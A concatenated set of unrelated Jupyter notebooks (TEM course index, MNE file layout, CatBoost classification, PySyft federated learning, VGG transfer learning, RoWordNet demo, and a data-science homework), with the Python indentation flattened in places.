# <font size = "5"> **[MSE672: Introduction to Transmission Electron Microscopy](../_MSE672_Intro_TEM.ipynb)**</font>
#
#
# by <NAME>, Spring 2021
#
# Microscopy Facilities<br>
# Joint Institute of Advanced Materials<br>
# Materials Science & Engineering<br>
# The University of Tennessee, Knoxville
#
# Background and methods for the analysis and quantification of data acquired with transmission electron microscopes.
# ## Introduction
#
# This notebook-book, -course, -series, or whatever you want to call it, is a collection of jupyter notebooks to analyse the various data which can be acquired with a transmission electron microscope (TEM).
#
# First of all, **you do not need to program anything**; however, you will have to change the values of input parameters in the code cells. Of course, you are encouraged to modify the code in order to explore the data analysis methods; after all, what can go wrong?
#
# The advantage of Jupyter notebooks is that they combine the usual textbook with the data analysis software. The intent of this book is not to provide a polished graphical user interface for fast data analysis, but to make explicit which numerical and physical methods are used to extract quantitative values from these data.
#
#
# ## Content
# This (note-) book is divided into the following sections:
#
# * **Chapter 1: [Introduction](CH1_00-Introduction.ipynb)**
# * [Python as it is used here](CH1_01-Introduction_Python.ipynb)
# * [Installation and Prerequisites](CH1_02-Prerequisites.ipynb)
# * [Matplotlib and Numpy for Micrographs](CH1_03-Data_Representation.ipynb)
# * [Open a (DM) file ](CH1_04-Open_Files.ipynb)
# * *Course Material*
# * [Course Organization](CH1_05-Course_Organization.ipynb)
# * [Overview](CH1_06-Overview.ipynb)
# * [Electron-Optics](CH1_07-Electron-Optics.ipynb)
#
#
#
# ## Navigation:
# - **[Front](../_MSE672_Intro_TEM.ipynb)**
#
|
Introduction/CH1_00-Introduction.ipynb
|
/ ---
/ jupyter:
/ jupytext:
/ text_representation:
/ extension: .q
/ format_name: light
/ format_version: '1.5'
/ jupytext_version: 1.14.4
/ ---
/ + cell_id="00000-fc462851-8f88-4427-9735-14dacc7c4189" execution_millis=1 execution_start=1604624288126 output_cleared=false source_hash="57592999" tags=[] language="bash"
/ python --version
/ + cell_id="00001-221ee7c9-8b8b-48ed-996a-a46aa551e77e" tags=[]
|
deepnote.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # Organizing your files for group analysis
#
# `
# Authors: <NAME> <<EMAIL>>
# `
#
# License: BSD (3-clause)
# This notebook shows an example of file organization for a group study.
#
# MNE uses the FreeSurfer philosophy which is to have a folder per subject.
#
# Here is an example:
#
# ```
#
# ├── MEG
# │   ├── sub01
# │   │   ├── sub01_run1_raw.fif
# │   │   ├── sub01_run2_raw.fif
# │   │   ├── ...
# │   │   ├── sub01-epo.fif
# │   │   ├── sub01-ave.fif
# │   │   ├── sub01-trans.fif
# │   │   ├── sub01-...-fwd.fif
# │   │   ├── sub01-...-src.fif
# │   │   └── sub01-...-inv.fif
# │   ├── sub02
# │   │   └── ...
# │   ├── sub03
# │   │   └── ...
# │   └── ...
# │
# ├── subjects
# │   ├── fsaverage
# │   ├── sub01
# │   │   ├── mri
# │   │   ├── surf
# │   │   ├── label
# │   │   └── ...
# │   ├── sub02
# │   │   └── ...
# │   └── sub03
# │       └── ...
# └── scripts
#     ├── 01-run_anatomy.ipy
#     ├── 02-run_filtering.ipy
#     ├── 03-run_extract_events.py
#     ├── 04-make_epochs.py
#     ├── 05-make_forward.py
#     ├── 06-make_inverse.py
#     ├── ...
#     ├── 99-make_reports.ipy
#     └── config.py
# ```
#
# The `MEG` folder contains all the functional data (MEG/EEG), and the `subjects` folder contains all the anatomical files obtained via FreeSurfer.
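# A folder skeleton like the one above can be scaffolded with a few lines of Python. This is just a sketch using only the standard library; the root and subject names are placeholders for illustration.

```python
from pathlib import Path

def make_study_layout(root, subjects=("sub01", "sub02", "sub03")):
    """Create a per-subject MEG/subjects/scripts folder skeleton."""
    root = Path(root)
    for sub in subjects:
        # functional data: one folder per subject under MEG/
        (root / "MEG" / sub).mkdir(parents=True, exist_ok=True)
        # anatomical data: FreeSurfer-style folders under subjects/
        for anat in ("mri", "surf", "label"):
            (root / "subjects" / sub / anat).mkdir(parents=True, exist_ok=True)
    (root / "subjects" / "fsaverage").mkdir(parents=True, exist_ok=True)
    (root / "scripts").mkdir(parents=True, exist_ok=True)
    return root

make_study_layout("my_study")
```

# The actual `.fif` files would then be written into each subject's `MEG` folder by the processing scripts.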
|
2016_05_Halifax/Day3/Group_analysis.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
from catboost import CatBoostClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import f1_score
# -
# First, I decided to try a random forest.
train = pd.read_csv('train.csv', sep='\t')
test = pd.read_csv('test.csv')
X_train = train.iloc[:, 2: -1]
y_train = train.iloc[:, -1]
X_test = test.iloc[:, 4:]
X_train.dropna(axis=1, how='any', inplace=True)
columns = []
for column in X_train.columns:
if len(np.unique(X_train[column])) < 1000:
columns += [column]
X_train = X_train[columns]  # keep only the low-cardinality columns (y_train is a Series, so no column selection is needed)
rfc = RandomForestClassifier(verbose=True, random_state=42)
rfc.fit(X_train, y_train)
y_pred_new = rfc.predict(test[columns])
y_pred_csv_new = pd.DataFrame()
y_pred_csv_new["Id"] = test["Id"]
y_pred_csv_new["mg"] = pd.DataFrame(y_pred_new)
y_pred_csv_new = y_pred_csv_new.iloc[:, 1:]
y_pred_csv_new.to_csv('solution_new_new_new.csv')
# Submitted it to the contest; the result was decent.
# Everyone around kept saying "boosting, boosting", so I gave it a try.
model = CatBoostClassifier(verbose=True, class_weights=[1, 1.5], random_seed=42)
fit_model = model.fit(X_train, y_train)
y_pred = fit_model.predict(test[columns])
len(np.where(y_pred==1)[0])
y_pred_csv = pd.DataFrame()
y_pred_csv["Id"] = test["Id"]
y_pred_csv["mg"] = pd.DataFrame(y_pred)
y_pred_csv.to_csv('solution_catbost.csv', index=None)
# Submitted it; the score improved.
# The main problem is class imbalance, so I assigned class weights, choosing the ratio from the counts of zeros and ones in the training set.
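# One simple way to pick the weight for the positive class is the ratio of negatives to positives in the training labels. A small sketch (the label array here is made up for illustration):

```python
import numpy as np

# toy labels standing in for y_train; imbalanced at roughly 6:1
y = np.array([0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1])

n_neg = int((y == 0).sum())
n_pos = int((y == 1).sum())
pos_weight = n_neg / n_pos  # weight for the minority (positive) class

print(n_neg, n_pos, pos_weight)  # 11 2 5.5
```

# With the real labels, `pos_weight` would be computed from `y_train` and passed as `class_weights=[1, pos_weight]` to `CatBoostClassifier`.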
train = pd.read_csv('train.csv', sep='\t')
train.dropna(axis=1, how='any', inplace=True)
X_train = train.iloc[:, 2: -1].iloc[:-int(len(train)*0.2),]
y_train = train.iloc[:, -1].iloc[:-int(len(train)*0.2),]
X_test = train.iloc[:, 2: -1].iloc[-int(len(train)*0.2):,]
y_test = train.iloc[:, -1].iloc[-int(len(train)*0.2):,]
model = CatBoostClassifier(class_weights=[1, 6], random_seed=42)
fit_model = model.fit(X_train, y_train)
y_pred = fit_model.predict(X_test)
f1_score(y_pred, y_test)
# Applied it to the full training set.
train = pd.read_csv('train.csv', sep='\t')
test = pd.read_csv('test.csv')
X_train = train.iloc[:, 2: -1]
y_train = train.iloc[:, -1]
X_test = test.iloc[:, 4:]
X_train.dropna(axis=1, how='any', inplace=True)
columns = []
for column in X_train.columns:
if len(np.unique(X_train[column])) < 1000:
columns += [column]
X_train = X_train[columns]  # keep only the low-cardinality columns
model = CatBoostClassifier(class_weights=[1, 6], random_seed=42)
fit_model = model.fit(X_train, y_train)
y_pred = fit_model.predict(X_test)
y_pred = y_pred.astype(int)
y_pred_csv = pd.DataFrame()
y_pred_csv["Id"] = test["Id"]
y_pred_csv["mg"] = pd.DataFrame(y_pred)
y_pred_csv.to_csv('solution_catboost_1.csv', index=None)
# There we go, everything worked.
train = pd.read_csv('train.csv', sep='\t')
X_train = train.iloc[:, 2: -1].iloc[:-int(len(train)*0.2),]
y_train = train.iloc[:, -1].iloc[:-int(len(train)*0.2),]
X_test = train.iloc[:, 2: -1].iloc[-int(len(train)*0.2):,]
y_test = train.iloc[:, -1].iloc[-int(len(train)*0.2):,]
X_train.dropna(axis=1, how='any', inplace=True)
columns = []
for column in X_train.columns:
if len(np.unique(X_train[column])) < 1000:
columns += [column]
X_train = X_train[columns]  # keep only the low-cardinality columns
weights = np.arange(5.5, 6.5, 0.05)
# +
w = 0
maximum = 0
y = np.array([])
for weight in weights:
model = CatBoostClassifier(class_weights=[1, weight], random_seed=42, verbose=False)
fit_model = model.fit(X_train, y_train)
y_pred = fit_model.predict(X_test)
score = f1_score(y_pred, y_test)
if score > maximum:
maximum = score
w = weight
y = y_pred
print("score", maximum)
print("weight", w)
print(y)  # predictions of the best-scoring model
# -
train = pd.read_csv('train.csv', sep='\t')
test = pd.read_csv('test.csv')
X_train = train.iloc[:, 2: -1]
y_train = train.iloc[:, -1]
X_test = test.iloc[:, 4:]
X_train.dropna(axis=1, how='any', inplace=True)
columns = []
for column in X_train.columns:
if len(np.unique(X_train[column])) < 1000:
columns += [column]
X_train = X_train[columns]  # keep only the low-cardinality columns
model = CatBoostClassifier(class_weights=[1, 6.24], random_seed=42, verbose=False)
fit_model = model.fit(X_train, y_train)
y_pred = fit_model.predict(X_test)
y_pred = y_pred.astype(int)
y_pred_csv = pd.DataFrame()
y_pred_csv["Id"] = test["Id"]
y_pred_csv["mg"] = pd.DataFrame(y_pred)
y_pred_csv.to_csv('solution_catboost_2.csv', index=None)
# That one didn't pan out, so I kept the previous solution.
|
hw4/main.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + tags=["parameters"]
epochs = 50
# + [markdown] lang="hi"
# # Part 7 - Federated Learning with a Federated Dataset
#
#
# Here we introduce a new tool for using federated datasets: the `FederatedDataset` class, which is intended to be used like the PyTorch `Dataset` class, and which is given to a `FederatedDataLoader` that iterates over it in a federated fashion.
#
#
# Authors:
# - <NAME> - Twitter: [@iamtrask](https://twitter.com/iamtrask)
# - <NAME> - Github: [@LaRiffle](https://github.com/LaRiffle)
#
# Translators/Editors:
# - <NAME> - Twitter: [@krunal_wrote](https://twitter.com/krunal_wrote)· Github: [@Noob-can-Compile](https://github.com/Noob-can-Compile)
#
# + [markdown] lang="hi"
# Let's use the sandbox that we discovered in the previous lesson
# -
import torch as th
import syft as sy
sy.create_sandbox(globals(), verbose=False)
# + [markdown] lang="hi"
# Then search for a dataset
# -
boston_data = grid.search("#boston", "#data")
boston_target = grid.search("#boston", "#target")
# + [markdown] lang="hi"
# We load a model and an optimizer
# +
n_features = boston_data['alice'][0].shape[1]
n_targets = 1
model = th.nn.Linear(n_features, n_targets)
# -
# Here we cast the data fetched into a `FederatedDataset`. Look at the workers that hold parts of the data.
# +
# Cast the result in BaseDatasets
datasets = []
for worker in boston_data.keys():
dataset = sy.BaseDataset(boston_data[worker][0], boston_target[worker][0])
datasets.append(dataset)
# Build the FederatedDataset object
dataset = sy.FederatedDataset(datasets)
print(dataset.workers)
optimizers = {}
for worker in dataset.workers:
optimizers[worker] = th.optim.Adam(params=model.parameters(),lr=1e-2)
# -
# We put it in a `FederatedDataLoader` and specify options
train_loader = sy.FederatedDataLoader(dataset, batch_size=32, shuffle=False, drop_last=False)
# And finally we iterate over the epochs. You can see how similar this is to pure, local PyTorch training!
for epoch in range(1, epochs + 1):
loss_accum = 0
for batch_idx, (data, target) in enumerate(train_loader):
model.send(data.location)
optimizer = optimizers[data.location.id]
optimizer.zero_grad()
pred = model(data)
loss = ((pred.view(-1) - target)**2).mean()
loss.backward()
optimizer.step()
model.get()
loss = loss.get()
loss_accum += float(loss)
if batch_idx % 8 == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tBatch loss: {:.6f}'.format(
epoch, batch_idx, len(train_loader),
100. * batch_idx / len(train_loader), loss.item()))
print('Total loss', loss_accum)
# # Congratulations!!! - Time to Join the Community!
#
#
# Congratulations on completing this notebook tutorial! If you enjoyed it and would like to join the movement toward privacy-preserving, decentralized ownership of AI and the AI supply chain (data), you can do so in the following ways!
#
# ### Star PySyft on GitHub!
#
# The easiest way to help our community is just by starring the GitHub repo! This helps raise awareness of the cool tools we're building.
#
# - [Star PySyft](https://github.com/OpenMined/PySyft)
#
# ### Join our Slack!
#
#
# The best way to keep up to date on the latest advancements is to join our community! You can do so by filling out the form at [http://slack.openmined.org](http://slack.openmined.org).
#
# ### Join a Code Project!
#
# The best way to contribute to our community is to become a code contributor! At any time you can go to the PySyft GitHub Issues page and filter for "Projects". This will show you all the top-level tickets, giving an overview of which projects you can join! If you don't want to join a project but would still like to do a bit of coding, you can also look for "one off" mini-projects by searching for GitHub issues marked "good first issue".
#
# - [PySyft Projects](https://github.com/OpenMined/PySyft/issues?q=is%3Aopen+is%3Aissue+label%3AProject)
# - [Good First Issue Tickets](https://github.com/OpenMined/PySyft/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22)
#
# ### Donate
#
# If you don't have time to contribute to our codebase but would still like to lend support, you can also become a Backer on our Open Collective. All donations go toward our web hosting and other community expenses such as hackathons and meetups!
#
# [OpenMined's Open Collective Page](https://opencollective.com/openmined)
|
examples/tutorials/translations/marathi/Part 07 - Federated Learning with Federated Dataset.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + id="EzeCCH4pNTIY" colab_type="code" outputId="eba28fd6-3ea2-4209-939b-6d7ce40cefd1" colab={"base_uri": "https://localhost:8080/", "height": 224}
# !wget https://download.microsoft.com/download/3/E/1/3E1C3F21-ECDB-4869-8368-6DEBA77B919F/kagglecatsanddogs_3367a.zip
# !unzip -q kagglecatsanddogs_3367a.zip
# + id="zOw7w2asNYN6" colab_type="code" outputId="44f03eac-bebf-4d23-9e97-e12dba4c8777" colab={"base_uri": "https://localhost:8080/", "height": 68}
import os
import numpy as np
import shutil
import glob
import warnings
warnings.filterwarnings('ignore')
cat_files = os.listdir('PetImages/Cat')
dog_files = os.listdir('PetImages/Dog')
for cat in cat_files:
src = os.path.join('PetImages/Cat',cat)
dst = os.path.join('PetImages/Cat','cat_'+cat)
os.rename( src,dst )
for dog in dog_files:
src = os.path.join('PetImages/Dog',dog)
dst = os.path.join('PetImages/Dog','dog_'+dog)
os.rename( src , dst )
cat_files = glob.glob('PetImages/Cat/*')
dog_files = glob.glob('PetImages/Dog/*')
print(len(cat_files),len(dog_files))
cat_train = np.random.choice(cat_files, size=3000, replace=False)
dog_train = np.random.choice(dog_files, size=3000, replace=False)
cat_files = list(set(cat_files) - set(cat_train))
dog_files = list(set(dog_files) - set(dog_train))
cat_val = np.random.choice(cat_files, size=1000, replace=False)
dog_val = np.random.choice(dog_files, size=1000, replace=False)
cat_files = list(set(cat_files) - set(cat_val))
dog_files = list(set(dog_files) - set(dog_val))
cat_test = np.random.choice(cat_files, size=1000, replace=False)
dog_test = np.random.choice(dog_files, size=1000, replace=False)
print('Cat datasets:', cat_train.shape, cat_val.shape, cat_test.shape)
print('Dog datasets:', dog_train.shape, dog_val.shape, dog_test.shape)
# #rm -r PetImages/ kagglecatsanddogs_3367a.zip readme\[1\].txt MSR-LA\ -\ 3467.docx
# + [markdown] id="RXwmVayNUY1q" colab_type="text"
# ### Splitting Train, Validation, Test Data
# + id="RVKEXBfqOCBN" colab_type="code" colab={}
train_dir = 'training_data'
val_dir = 'validation_data'
test_dir = 'test_data'
train_files = np.concatenate([cat_train, dog_train])
validate_files = np.concatenate([cat_val, dog_val])
test_files = np.concatenate([cat_test, dog_test])
os.makedirs(train_dir, exist_ok=True)
os.makedirs(val_dir, exist_ok=True)
os.makedirs(test_dir, exist_ok=True)
for fn in train_files:
shutil.copy(fn, train_dir)
for fn in validate_files:
shutil.copy(fn, val_dir)
for fn in test_files:
shutil.copy(fn, test_dir)
# #!rm -r test_data/ training_data/ validation_data/
# + id="9NO8v9c37FFt" colab_type="code" outputId="2faafa1d-30d8-40ba-b527-48237fd45a16" colab={"base_uri": "https://localhost:8080/", "height": 51}
from keras.preprocessing.image import ImageDataGenerator, load_img, img_to_array, array_to_img
IMG_DIM = (150,150)
train_files = glob.glob('training_data/*')
train_imgs = [];train_labels = []
for file in train_files:
try:
train_imgs.append( img_to_array(load_img( file,target_size=IMG_DIM )) )
train_labels.append(file.split('/')[1].split('_')[0])
except:
pass
validation_files = glob.glob('validation_data/*')
validation_imgs = [];validation_labels = []
for file in validation_files:
try:
validation_imgs.append( img_to_array(load_img( file,target_size=IMG_DIM )) )
validation_labels.append(file.split('/')[1].split('_')[0])
except:
pass
train_imgs = np.array(train_imgs)
validation_imgs = np.array(validation_imgs)
print('Train dataset shape:', train_imgs.shape,
'\tValidation dataset shape:', validation_imgs.shape)
# + id="uCiF0caJFpqk" colab_type="code" colab={}
# encode text category labels
from sklearn.preprocessing import LabelEncoder
le = LabelEncoder()
le.fit(train_labels)
train_labels_enc = le.transform(train_labels)
validation_labels_enc = le.transform(validation_labels)
# + [markdown] id="eF9tlYMGFKVm" colab_type="text"
# ### Image Augmentation
# + id="Nu39Vxd2DKd-" colab_type="code" colab={}
train_datagen = ImageDataGenerator(rescale=1./255,
zoom_range=0.3,
rotation_range=50,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
horizontal_flip=True,
fill_mode='nearest')
val_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow(train_imgs, train_labels_enc, batch_size=30)
val_generator = val_datagen.flow(validation_imgs, validation_labels_enc, batch_size=20)
# + [markdown] id="F48T5RXzF7RJ" colab_type="text"
# ### Keras Model
# + id="6DUkRSxBFT1B" colab_type="code" outputId="459c6f77-6b14-4289-cfc2-c8feaf1734c8" colab={"base_uri": "https://localhost:8080/", "height": 1108}
from keras.layers import Flatten, Dense, Dropout
from keras.applications import VGG16
from keras.models import Model
from keras import optimizers
input_shape = (150, 150, 3)
vgg = VGG16(include_top=False, weights='imagenet',input_shape=input_shape)
vgg.trainable = False
for layer in vgg.layers[:-8]:
layer.trainable = False
vgg_output = vgg.layers[-1].output
fc1 = Flatten()(vgg_output)
fc1 = Dense(512, activation='relu')(fc1)
fc1_dropout = Dropout(0.3)(fc1)
fc2 = Dense(512, activation='relu')(fc1_dropout)
fc2_dropout = Dropout(0.3)(fc2)
output = Dense(1, activation='sigmoid')(fc2_dropout)
model = Model(vgg.input, output)
model.compile(loss='binary_crossentropy',
optimizer=optimizers.RMSprop(lr=1e-4),
metrics=['accuracy'])
model.summary()
# + id="IzZWB0Spf627" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 824} outputId="bde31ee6-2d7a-408f-c2ee-8c152fa42952"
import pandas as pd
layers = [(layer, layer.name, layer.trainable) for layer in model.layers]
pd.DataFrame(layers, columns=['Layer Type', 'Layer Name', 'Layer Trainable'])
# + id="-imFB6g1H6MW" colab_type="code" outputId="1fd82f44-a4d3-45fb-d36a-784de9fc0175" colab={"base_uri": "https://localhost:8080/", "height": 2128}
from keras.callbacks import EarlyStopping, ModelCheckpoint
filepath="saved_models/vgg_transfer_learn_dogvscat.h5"
save_model_cb = ModelCheckpoint(filepath, monitor='val_acc', verbose=2, save_best_only=True, mode='max')
# callback to stop the training if no improvement
early_stopping_cb = EarlyStopping(monitor='val_loss', patience=7, mode='min')
callbacks_list = [save_model_cb,early_stopping_cb]
history = model.fit_generator(train_generator, steps_per_epoch=100, epochs=100,
validation_data=val_generator, validation_steps=50,
verbose=2,callbacks=callbacks_list)
# + [markdown] id="hS7j25QOULsG" colab_type="text"
# ### Model Performance
# + id="fx-Ud_eqIYco" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 308} outputId="06636480-1019-4b8a-b356-1828a212458a"
# %matplotlib inline
import matplotlib.pyplot as plt
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 4))
t = f.suptitle('Basic CNN Performance', fontsize=12)
f.subplots_adjust(top=0.85, wspace=0.3)
epoch_list = history.epoch
ax1.plot(epoch_list, history.history['acc'], label='Train Accuracy')
ax1.plot(epoch_list, history.history['val_acc'], label='Validation Accuracy')
ax1.set_xticks(np.arange(0, epoch_list[-1], 3))
ax1.set_ylabel('Accuracy Value')
ax1.set_xlabel('Epoch')
ax1.set_title('Accuracy')
l1 = ax1.legend(loc="best")
ax2.plot(epoch_list, history.history['loss'], label='Train Loss')
ax2.plot(epoch_list, history.history['val_loss'], label='Validation Loss')
ax2.set_xticks(np.arange(0, epoch_list[-1], 3))
ax2.set_ylabel('Loss Value')
ax2.set_xlabel('Epoch')
ax2.set_title('Loss')
l2 = ax2.legend(loc="best")
# + id="6H3SOuDPKrW5" colab_type="code" colab={}
if not os.path.exists('saved_models'): os.mkdir('saved_models')
model.save('saved_models/vgg_transfer_learn_dogvscat.h5')
# + id="U5MAybMyOlkU" colab_type="code" colab={}
|
Using_VGG_Transfer_Learning.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## This demo shows the basic components and operations of RoWordNet.
#
#
#
#
# The first operation is to create a wordnet by using the internal resources.
import rowordnet
wn = rowordnet.RoWordNet()
# If you want to create a wordnet using your own resources you have to specify a ``filepath`` to the file and whether the file is binary or xml. You can also create an empty wordnet by setting the parameter ``empty`` to ``True``.
#
# Now that we have created a wordnet, we can search for words. This action will return one or more synsets (the main component of a wordnet; see the synset/relation creation and editing for more details).
word = 'arbore'
synset_ids = wn.synsets(literal=word)
print("Total number of synsets containing literal '{}': {}".format(word, len(synset_ids)))
print(synset_ids)
# To print detailed information about a synset we use ``print_synset`` and provide the synset id.
synset_id = synset_ids[4]
wn.print_synset(synset_id)
# To obtain a synset object we simply use ``wn.synset()`` with the synset id as a parameter. We can also obtain the synset object by using ``wn()`` directly and passing the synset id as a parameter.
synset_object = wn.synset(synset_id)
print(synset_object)
synset_object = wn(synset_id)
print(synset_object)
# Every synset has a set of words called 'literals'. We can access them through the ``literals`` property of a synset.
literals = synset_object.literals
print("Synset with id {} has {} literals: {}".format(synset_object.id, len(literals), literals))
# Having accessed the ``literals`` of a synset, we can access and modify any property (WARNING: you can't modify the ``id``). Now let's try to access and modify the ``definition`` property.
definition = synset_object.definition
print("Definition of the synset with id {}: {}".format(synset_object.id, definition))
new_definition = "This is a new definition"
synset_object.definition = new_definition
print("New definition of the synset with id {}: {}".format(synset_object.id, synset_object.definition))
# Calling ``wn.synsets()`` with no arguments returns a list containing all the synset ids of the wordnet.
synsets_id = wn.synsets()
print("Total number of synsets: {} \n".format(len(synsets_id)))
# There are 4 parts of speech in RoWordNet: nouns, verbs, adjectives and adverbs. To filter the synsets, provide a part of speech via the ``pos`` parameter.
# +
from rowordnet import Synset
# return all noun synsets
synsets_id_nouns = wn.synsets(pos=Synset.Pos.NOUN)
print("Total number of noun synsets: {}".format(len(synsets_id_nouns)))
# return all verb synsets
synsets_id_verbs = wn.synsets(pos=Synset.Pos.VERB)
print("Total number of verb synsets: {}".format(len(synsets_id_verbs)))
# return all adjective synsets
synsets_id_adjectives = wn.synsets(pos=Synset.Pos.ADJECTIVE)
print("Total number of adjective synsets: {}".format(len(synsets_id_adjectives)))
# return all adverb synsets
synsets_id_adverbs = wn.synsets(pos=Synset.Pos.ADVERB)
print("Total number of adverb synsets: {}".format(len(synsets_id_adverbs)))
# -
# ### We continue with examples of navigating in the wordnet
#
# Synsets are linked by relations, encoded as directed edges in a graph. To see all the relation types, access the ``relation_types`` property of the wordnet.
print("This wordnet contains {} relation types".format(len(wn.relation_types)))
# Every synset has a number of synsets that it points to (outbound relations) and a set of synsets that point to it (inbound relations). We can access these synsets and the relations between them using the ``outbound_relations`` and ``inbound_relations`` functions, respectively. We can also access both the inbound and outbound relations of a synset through the ``relations`` function. Note that ``relations`` loses directionality, as it is simply a concatenation of the inbound and outbound relations; it is a convenience for printing rather than for operations or search in the wordnet.
# +
# print all outbound relations of a synset
synset_id = wn.synsets("tren")[0]
print("Print all outbound relations of synset with id {}".format(synset_id))
outbound_relations = wn.outbound_relations(synset_id)
for outbound_relation in outbound_relations:
target_synset_id = outbound_relation[0]
relation = outbound_relation[1]
print("\tRelation [{}] to synset {}".format(relation, target_synset_id))
# print all inbound relations of a synset
print("\nPrint all inbound relations of synset with id {}".format(synset_id))
for source_synset_id, relation in wn.inbound_relations(synset_id):
print("\tRelation [{}] from synset {}".format(relation, source_synset_id))
# get all relations of the same synset
relations = wn.relations(synset_id)
print("\nThe synset has {} total relations.".format(len(relations)))
# -
# To travel through the wordnet, use ``bfwalk()`` and provide a synset id as the starting location. This function is a generator that yields breadth-first steps, which can be used to traverse the wordnet.
# get a new synset
new_synset_id = wn.synsets("cal")[2]
# travel the graph Breadth First
counter = 0
print("\n\tTravel breadth-first through wordnet starting with synset '{}' (first 10 synsets) ..."
.format(new_synset_id))
for current_synset_id, relation, from_synset_id in wn.bfwalk(new_synset_id):
counter += 1
# bfwalk is a generator that yields, for each call, a BF step through wordnet
# you do actions with current_synset_id, relation, from_synset_id
print("\t\t Step {}: from synset {}, with relation [{}] to synset {}"
.format(counter, from_synset_id, relation, current_synset_id))
if counter >= 10:
break
# Because the wordnet is represented as a graph whose nodes are synset ids and whose edges are the relations between them, you can calculate the shortest path between two synsets with ``shortest_path``. You can additionally provide a filter to this function, and the shortest path will then be calculated following only the specified relations.
# +
# shortest path unfiltered
synset1_id = wn.synsets("cal")[2]
synset2_id = wn.synsets("iepure")[0]
distance = wn.shortest_path(synset1_id, synset2_id)
print("List of synsets containing the shortest path from synset with id '{}' to synset with id '{}': "
.format(synset1_id, synset2_id))
print("{}".format(distance))
# shortest path filtered with 'hypernym' and 'hyponym' relations
relations = set(['hypernym', 'hyponym'])
filtered_distance = wn.shortest_path(synset1_id, synset2_id, relations)
print("\nList of synsets containing the shortest filtered path from synset with id '{}' to synset with id '{}': "
.format(synset1_id, synset2_id))
print("{}".format(filtered_distance))
# -
# There's a special set of relations (hyponym and hypernym) that creates what's called the hypernym tree. This tree illustrates the "is a" relation: for instance, a 'flower' is a 'plant'. We have provided several functions that interact with this tree, such as finding the lowest common ancestor of two synsets or printing the path to the root starting from a synset.
# +
# get the lowest common ancestor in the hypernym tree
synset1_id = wn.synsets("cal")[2]
synset2_id = wn.synsets("iepure")[0]
synset_id = wn.lowest_hypernym_common_ancestor(synset1_id, synset2_id)
print("The lowest common ancestor in the hypernym tree of synset {} and {} is {}".format(synset1_id, synset2_id, synset_id))
# get the path from a given synset to its root in the hypernym tree
synset_id = wn.synsets()[0]
print("\nList of synset ids from synset with id '{}' up to its root in the hypernym tree: ".format(synset_id))
print("{}".format(wn.synset_to_hypernym_root(synset_id)))
|
jupyter/basic_operations_wordnet.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Homework 2: Arrays and Tables
# **Reading**: Textbook chapters [4](http://www.inferentialthinking.com/chapters/04/data-types.html) and [5](http://www.inferentialthinking.com/chapters/05/tables.html).
# Please complete this notebook by filling in the cells provided. Before you begin, execute the following cell to load the provided tests. Each time you start your server, you will need to execute this cell again to load the tests.
#
# Homework 2 is due Thursday, 9/7 at 11:59pm. Start early so that you can come to office hours if you're stuck. Check the website for the office hours schedule.
# You will receive an early submission bonus point if you turn in your final submission by Wednesday, 9/6 at 11:59pm. Late work will not be accepted unless you have made special arrangements with your (U)GSI or the instructor.
# +
# Don't change this cell; just run it.
import numpy as np
from datascience import *
from client.api.notebook import Notebook
ok = Notebook('hw02.ok')
_ = ok.auth(inline=True)
# -
# <font color="#E74C3C">**Important**: In this homework, the `ok` tests will tell you whether your answer is correct, except for Parts 1, 5, & 6. In future homework assignments, correctness tests will typically not be provided.</font>
# ## 1. Studying the Survivors
#
# The Reverend <NAME> was skeptical of <NAME>’s conclusion about the Broad Street pump. After the Broad Street cholera epidemic ended, Whitehead set about trying to prove Snow wrong. (The history of the event is detailed [here](http://www.ncbi.nlm.nih.gov/pmc/articles/PMC1034367/pdf/medhist00183-0026.pdf).)
#
# He realized that Snow had focused his analysis almost entirely on those who had died. Whitehead, therefore, investigated the drinking habits of people in the Broad Street area who had not died in the outbreak.
#
# What is the main reason it was important to study this group?
#
# 1) If Whitehead had found that many people had drunk water from the Broad Street pump and not caught cholera, that would have been evidence against Snow's hypothesis.
#
# 2) Survivors could provide additional information about what else could have caused the cholera, potentially unearthing another cause.
#
# 3) Through considering the survivors, Whitehead could have identified a cure for cholera.
# Assign survivor_answer to 1, 2, or 3
survivor_answer = 1
_ = ok.grade('q1_1')
# **Note:** Whitehead ended up finding further proof that the Broad Street pump played the central role in spreading the disease to the people who lived near it. Eventually, he became one of Snow’s greatest defenders.
# ## 2. Creating Arrays
#
# **Question 1.** Make an array called `weird_numbers` containing the following numbers (in the given order):
#
# 1. -2
# 2. the sine of 1.2
# 3. 3
# 4. 5 to the power of the cosine of 1.2
#
# *Hint:* `sin` and `cos` are functions in the `math` module.
# Our solution involved one extra line of code before creating
# weird_numbers.
import math
weird_numbers = make_array(-2, math.sin(1.2), 3, pow(5, math.cos(1.2)))
weird_numbers
_ = ok.grade('q2_1')
